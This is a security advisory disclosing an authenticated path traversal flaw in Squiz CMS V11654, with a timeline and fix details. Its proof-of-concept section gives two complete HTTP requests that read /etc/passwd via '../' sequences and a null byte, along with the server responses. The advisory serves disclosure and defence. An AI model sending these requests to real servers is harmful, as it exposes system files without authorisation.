Squiz CMS File Path Traversal
Summary
Name: Squiz CMS – File Path Traversal
Release Date: 30 November 2012
Reference: NGS00330
Discoverer: Robert Ray
Vendor: Squiz
Vendor Reference: 11846
Systems Affected: Squiz CMS V11654
Risk: High
Status: Published
TimeLine
Discovered: 29 June 2012
Released: 29 June 2012
Approved: 2 July 2012
Reported: 9 July 2012
Fixed: 9 August 2012
Published: 30 November 2012
Description
Squiz CMS V11654 – File Path Traversal
I. VULNERABILITY
The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated attackers to gain access to arbitrary system files.
II. BACKGROUND
Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, Associations Not For Profit, Corporate, Finance Professional Services, Cultural Institutions, Education, Government Public Sector, Health Social Services, Media
Publishing, Travel Tourism etc.
http://www.squiz.co.uk/showcase/
III. DESCRIPTION
Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is possible for users to self register within the software if configured for this use case.
Technical Details
IV. PROOF OF CONCEPT
The vulnerabilities detected include method by means of a REST parameter:
GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: /
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4
HTTP/1.1 200 OK
Content-type: application/octet-stream
Expires: Sun, 1 Jul 2012 00:00:00
Last-Modified: Sat, 30 Jun 2012 00:00:00
Content-Length: 1236
Date: Fri, 29 Jun 2012 21:46:36 GMT
Server: lighttpd/1.4.28
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
And also by means of the “modeType” GET parameter.
GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: */*
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4
HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Date: Fri, 29 Jun 2012 19:56:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1236
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
Fix Information
The vendor has released an update to address this issue. Fixed in version
11846.
http://cms.squizsuite.net/download